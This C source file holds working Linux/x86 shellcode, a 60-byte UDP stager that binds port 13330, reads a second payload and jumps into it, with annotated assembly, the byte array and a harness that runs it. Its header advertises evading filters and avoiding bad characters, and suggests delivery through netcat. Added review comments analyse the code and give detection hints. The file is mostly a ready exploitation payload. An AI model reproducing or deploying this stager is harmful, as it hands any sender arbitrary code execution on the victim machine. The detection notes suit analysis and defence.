/**
 ** Linux/x86 udp + read + exec shellcode (c) gunzip
 **
 ** reads from udp port 13330 another shellcode then executes it
 ** 
 ** 1. Udp is usually not filtered
 ** 2. You can send very big shellcode (size <= 65535)
 ** 3. It's shorter than any tcp bind-shellcode (just 60 bytes)
 ** 4. Your sent shellcodes can contain any char ( 0x00 too )
 ** 5. You can send a whole shell script to execute with a command code
 ** 6. Does not contain CR, LF, spaces, slashes and so on  
 ** 7. No need to search for file descriptors
 ** 
 ** gunzip@ircnet <techieone@softhome.net>
 ** http://members.xoom.it/gunzip
 **
 ** If you can't figure it out how to use this you don't need this.. 
 ** hint: try with puts( shellcode ) and pipe netcat -u host
 **
 ** HaPPy BiRtHdAy tankie !!! :-]
 ** 
 **/

/*
 * udp_exec - annotated assembly source for the bytes stored in shellcode[].
 *
 * Nothing in this listing calls udp_exec(); main() jumps into the
 * pre-assembled shellcode[] array instead. The body issues three raw
 * i386 Linux system calls through int $0x80, in order:
 *
 *   1. socketcall(1 = socket):  socket(AF_INET, SOCK_DGRAM, 0)
 *   2. socketcall(2 = bind):    bind the socket to INADDR_ANY on the port
 *      whose in-memory bytes are 0x34 0x12 (13330 in network byte order;
 *      `pushw $0x1234` stores them little-endian).
 *   3. read(fd, buf, 0xffff):   reserve 0xffff bytes below the stack
 *      pointer, read into that area, then `jmp *%ecx` into it.
 *
 * The socket fd returned by step 1 is pushed as the first bind() argument
 * and is re-read from (%esp) for the read() call.
 *
 * Review notes:
 *   - No return value is checked. The `cltd` / `movb $0x03,%al` pair only
 *     produces edx = 0xffff and eax = 3 when bind() returned 0; the final
 *     jmp is taken whether or not read() delivered any data.
 *   - Whatever arrives on the socket is executed as-is: there is no
 *     authentication, length check or integrity check, so any sender that
 *     can reach the port decides what runs in this process.
 *   - The jump target is stack memory, so the technique depends on the
 *     stack being executable; with a non-executable stack the jmp faults.
 *   - The length pushed for bind() is 0x16 (22 decimal). The inline label
 *     says sizeof(struct sockaddr), which is 16 (0x10) on Linux; presumably
 *     the kernel tolerates the larger value - TODO confirm.
 *   - Behaviour worth alerting on: a process that suddenly holds a UDP
 *     socket bound to INADDR_ANY, followed by control flow into a freshly
 *     written stack region. The port is a two-byte constant (see PORT), so
 *     it should not be the only indicator a detection relies on.
 *   - The asm text is one string literal spanning raw newlines, which is
 *     not valid ISO C; it relies on an old GCC extension - NOTE(review):
 *     expect current compilers to reject it.
 */
void udp_exec()
{
	__asm__("
		/* fd = socket( AF_INET, SOCK_DGRAM, 0 ) */

                xorl    %eax,   %eax
                xorl    %ebx,   %ebx
		incl	%ebx			# socket()
                pushl   %eax			# IPPROTO_IP
		pushl	$0x2			# SOCK_DGRAM
		pushl	$0x2			# AF_INET
                movl    %esp,   %ecx
                movb    $0x66,  %al             # SYS_socketcall
                int     $0x80

		/* bind(s, (struct sockaddr *)&sa, sizeof(sa)) */

		decl	%ebx			# ebx = 0x0
		pushl	%ebx			# PAD
		pushl	%ebx			# PAD
		pushl 	%ebx			# INADDR_ANY
		pushw	$0x1234			# PORT  (13330)
		pushw	$0x2			# ADDRESS FAMILY
		movl	%esp,	%ecx		
		pushl	$0x16			# sizeof(struct sockaddr)
		pushl	%ecx			# pointer to struct sockaddr
		pushl	%eax			# socket file descriptor
		movl	%esp,	%ecx		# SYS_socketcall * args
		movb	$0x2,   %bl		# SYS_socketcall bind()

		push	$0x66			# SYS_socketcall
		popl	%eax
		int	$0x80

		/* read( s, buf, 0xffff ); jmp *buf */

                movl    (%esp),	%ebx            # socket fd
		cltd				# on bind success eax = 0x0
		movw	$0xffff,%dx		# len = 65535
		subl	%edx, 	%esp		# reserves space
                movl    %esp,   %ecx            # where to read
		movb   	$0x03,	%al		# SYS_read
		int    	$0x80
		jmp	*%ecx
		");
}

/*
 * The two port bytes exactly as they appear in the instruction stream.
 * Read in network (big-endian) order they are 0x3412 = 13330; the asm
 * listing writes the same bytes as `pushw $0x1234`.
 */
#define PORT	"\x34\x12"

/*
 * Assembled form of the udp_exec() listing: 60 bytes in total
 * (16 + 16 + 16 + 12 across the four lines below).
 *
 * "\x66\x68" PORT is the `pushw` of the port, and the trailing
 * "\xff\xe1" is the final `jmp *%ecx` into the received data.
 * The string contains no 0x00 byte, which is why strlen() in main()
 * reports the full length.
 *
 * NOTE(review): PORT is spliced in as a macro, presumably so the port can
 * be changed without re-assembling. A byte signature for this sequence
 * should therefore match the opcodes around those two bytes rather than
 * the port value itself.
 */
char shellcode[]=
	"\x31\xc0\x31\xdb\x43\x50\x6a\x02\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
	"\x4b\x53\x53\x53\x66\x68" PORT "\x66\x6a\x02\x89\xe1\x6a\x16\x51"
	"\x50\x89\xe1\xb3\x02\x6a\x66\x58\xcd\x80\x8b\x1c\x24\x99\x66\xba"
	"\xff\xff\x29\xd4\x89\xe1\xb0\x03\xcd\x80\xff\xe1";

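/*
 * main - test harness for shellcode[].
 *
 * Prints the length of the byte string, then calls it through a function
 * pointer. In the normal case f() never returns: the bytes block in
 * read() on the bound UDP socket and then jump into whatever was received.
 *
 * shellcode[] is an ordinary initialised, writable array. Where data
 * pages are mapped non-executable the call is expected to fault rather
 * than run the bytes.
 *
 * NOTE(review): this listing shows no #include lines; printf() and
 * strlen() need <stdio.h> and <string.h> to be declared.
 *
 * Returns 0 if control ever comes back from f().
 */
int main(void)
{
	/* Object-pointer to function-pointer conversion, as in the original. */
	void (*f)() = (void *)&shellcode;

	/* strlen() yields size_t; cast it so the conversion specifier matches. */
	printf("\n[+] Udp read shellcode by gunzip, len = %lu\n",
	       (unsigned long)strlen(shellcode));
	f();
	return 0;
}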

